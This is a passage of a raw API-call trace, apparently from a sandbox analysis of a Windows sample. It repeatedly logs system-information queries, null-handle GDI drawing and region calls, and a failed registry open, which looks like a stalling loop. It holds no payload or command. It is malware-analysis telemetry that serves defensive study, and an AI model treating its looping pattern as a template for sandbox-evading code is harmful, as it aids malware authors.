dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.212] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.212] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.212] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.212] BeginPath (hdc=0x0) returned 0 [0088.212] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.212] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.212] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.212] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.212] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.212] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.212] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.212] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.212] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9a0401cd [0088.212] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x980401d0 [0088.212] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041062 [0088.212] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041063 [0088.212] CombineRgn (hrgnDst=0x1041062, hrgnSrc1=0x9a0401cd, hrgnSrc2=0x980401d0, iMode=1) returned 1 [0088.212] CombineRgn (hrgnDst=0x1041063, hrgnSrc1=0x9a0401cd, hrgnSrc2=0x980401d0, iMode=4) returned 2 [0088.212] CreateSolidBrush (color=0xff) returned 0x2101061 [0088.212] CreateSolidBrush (color=0xff0000) returned 0x1101064 [0088.212] DeleteObject (ho=0x1101064) returned 1 [0088.212] DeleteObject (ho=0x980401d0) returned 1 [0088.212] DeleteObject (ho=0x9a0401cd) returned 1 [0088.213] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.213] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.213] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.213] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.213] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.213] BeginPath (hdc=0x0) returned 0 [0088.213] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.213] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.213] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.213] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.213] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.213] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.213] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.213] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.213] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x990401d0 [0088.213] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9b0401cd [0088.213] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041065 [0088.213] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041066 [0088.213] CombineRgn (hrgnDst=0x1041065, hrgnSrc1=0x990401d0, hrgnSrc2=0x9b0401cd, iMode=1) returned 1 [0088.213] CombineRgn (hrgnDst=0x1041066, hrgnSrc1=0x990401d0, hrgnSrc2=0x9b0401cd, iMode=4) returned 2 [0088.213] CreateSolidBrush (color=0xff) returned 0x2101064 [0088.213] CreateSolidBrush (color=0xff0000) returned 0x1101067 [0088.213] DeleteObject (ho=0x1101067) returned 1 [0088.213] DeleteObject (ho=0x9b0401cd) returned 1 [0088.213] DeleteObject (ho=0x990401d0) returned 1 [0088.213] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.213] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.213] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.213] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.213] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.213] BeginPath (hdc=0x0) returned 0 [0088.213] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.213] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.213] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.213] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.213] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.213] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.213] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.213] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.214] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9c0401cd [0088.214] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9a0401d0 [0088.214] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041068 [0088.214] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041069 [0088.214] CombineRgn (hrgnDst=0x1041068, hrgnSrc1=0x9c0401cd, hrgnSrc2=0x9a0401d0, iMode=1) returned 1 [0088.214] CombineRgn (hrgnDst=0x1041069, hrgnSrc1=0x9c0401cd, hrgnSrc2=0x9a0401d0, iMode=4) returned 2 [0088.214] CreateSolidBrush (color=0xff) returned 0x2101067 [0088.214] CreateSolidBrush (color=0xff0000) returned 0x110106a [0088.214] DeleteObject (ho=0x110106a) returned 1 [0088.214] DeleteObject (ho=0x9a0401d0) returned 1 [0088.214] DeleteObject (ho=0x9c0401cd) returned 1 [0088.214] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.214] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.214] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.214] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.214] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.214] BeginPath (hdc=0x0) returned 0 [0088.214] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.214] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.214] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.214] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.214] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.214] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.214] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.214] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.214] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9b0401d0 [0088.214] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9d0401cd [0088.214] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104106b [0088.214] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104106c [0088.214] CombineRgn (hrgnDst=0x104106b, hrgnSrc1=0x9b0401d0, hrgnSrc2=0x9d0401cd, iMode=1) returned 1 [0088.214] CombineRgn (hrgnDst=0x104106c, hrgnSrc1=0x9b0401d0, hrgnSrc2=0x9d0401cd, iMode=4) returned 2 [0088.214] CreateSolidBrush (color=0xff) returned 0x210106a [0088.214] CreateSolidBrush (color=0xff0000) returned 0x110106d [0088.214] DeleteObject (ho=0x110106d) returned 1 [0088.214] DeleteObject (ho=0x9d0401cd) returned 1 [0088.215] DeleteObject (ho=0x9b0401d0) returned 1 [0088.215] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.215] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.215] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.215] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.215] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.215] BeginPath (hdc=0x0) returned 0 [0088.215] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.215] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.215] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.215] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.215] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.215] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.215] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.215] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.215] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9e0401cd [0088.215] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9c0401d0 [0088.215] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104106e [0088.215] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104106f [0088.215] CombineRgn (hrgnDst=0x104106e, hrgnSrc1=0x9e0401cd, hrgnSrc2=0x9c0401d0, iMode=1) returned 1 [0088.215] CombineRgn (hrgnDst=0x104106f, hrgnSrc1=0x9e0401cd, hrgnSrc2=0x9c0401d0, iMode=4) returned 2 [0088.215] CreateSolidBrush (color=0xff) returned 0x210106d [0088.215] CreateSolidBrush (color=0xff0000) returned 0x1101070 [0088.215] DeleteObject (ho=0x1101070) returned 1 [0088.215] DeleteObject (ho=0x9c0401d0) returned 1 [0088.215] DeleteObject (ho=0x9e0401cd) returned 1 [0088.215] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.215] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.215] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.215] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.215] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.215] BeginPath (hdc=0x0) returned 0 [0088.215] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.215] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.215] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.215] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.215] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.215] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.215] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.215] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.216] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9d0401d0 [0088.216] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9f0401cd [0088.216] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041071 [0088.216] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041072 [0088.216] CombineRgn (hrgnDst=0x1041071, hrgnSrc1=0x9d0401d0, hrgnSrc2=0x9f0401cd, iMode=1) returned 1 [0088.216] CombineRgn (hrgnDst=0x1041072, hrgnSrc1=0x9d0401d0, hrgnSrc2=0x9f0401cd, iMode=4) returned 2 [0088.216] CreateSolidBrush (color=0xff) returned 0x2101070 [0088.216] CreateSolidBrush (color=0xff0000) returned 0x1101073 [0088.216] DeleteObject (ho=0x1101073) returned 1 [0088.216] DeleteObject (ho=0x9f0401cd) returned 1 [0088.216] DeleteObject (ho=0x9d0401d0) returned 1 [0088.216] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.216] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.216] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.216] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.216] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.216] BeginPath (hdc=0x0) returned 0 [0088.216] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.216] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.216] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.216] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.216] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.216] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.216] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.216] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.216] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa00401cd [0088.216] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x9e0401d0 [0088.216] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041074 [0088.216] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041075 [0088.216] CombineRgn (hrgnDst=0x1041074, hrgnSrc1=0xa00401cd, hrgnSrc2=0x9e0401d0, iMode=1) returned 1 [0088.216] CombineRgn (hrgnDst=0x1041075, hrgnSrc1=0xa00401cd, hrgnSrc2=0x9e0401d0, iMode=4) returned 2 [0088.216] CreateSolidBrush (color=0xff) returned 0x2101073 [0088.216] CreateSolidBrush (color=0xff0000) returned 0x1101076 [0088.216] DeleteObject (ho=0x1101076) returned 1 [0088.216] DeleteObject (ho=0x9e0401d0) returned 1 [0088.216] DeleteObject (ho=0xa00401cd) returned 1 [0088.216] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.216] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.216] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.217] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.217] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.217] BeginPath (hdc=0x0) returned 0 [0088.217] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.217] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.217] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.217] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.217] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.217] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.217] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.217] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.217] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x9f0401d0 [0088.217] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa10401cd [0088.217] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041077 [0088.217] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041078 [0088.217] CombineRgn (hrgnDst=0x1041077, hrgnSrc1=0x9f0401d0, hrgnSrc2=0xa10401cd, iMode=1) returned 1 [0088.217] CombineRgn (hrgnDst=0x1041078, hrgnSrc1=0x9f0401d0, hrgnSrc2=0xa10401cd, iMode=4) returned 2 [0088.217] CreateSolidBrush (color=0xff) returned 0x2101076 [0088.217] CreateSolidBrush (color=0xff0000) returned 0x1101079 [0088.217] DeleteObject (ho=0x1101079) returned 1 [0088.217] DeleteObject (ho=0xa10401cd) returned 1 [0088.217] DeleteObject (ho=0x9f0401d0) returned 1 [0088.217] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.217] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.217] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.217] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.217] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.217] BeginPath (hdc=0x0) returned 0 [0088.217] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.217] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.217] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.217] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.217] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.217] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.217] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.217] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.217] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xa20401cd [0088.217] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xa00401d0 [0088.217] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104107a [0088.218] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104107b [0088.218] CombineRgn (hrgnDst=0x104107a, hrgnSrc1=0xa20401cd, hrgnSrc2=0xa00401d0, iMode=1) returned 1 [0088.218] CombineRgn (hrgnDst=0x104107b, hrgnSrc1=0xa20401cd, hrgnSrc2=0xa00401d0, iMode=4) returned 2 [0088.218] CreateSolidBrush (color=0xff) returned 0x2101079 [0088.218] CreateSolidBrush (color=0xff0000) returned 0x110107c [0088.218] DeleteObject (ho=0x110107c) returned 1 [0088.218] DeleteObject (ho=0xa00401d0) returned 1 [0088.218] DeleteObject (ho=0xa20401cd) returned 1 [0088.218] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.218] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.218] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.218] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.218] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.218] BeginPath (hdc=0x0) returned 0 [0088.218] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.218] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.218] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.218] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.218] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 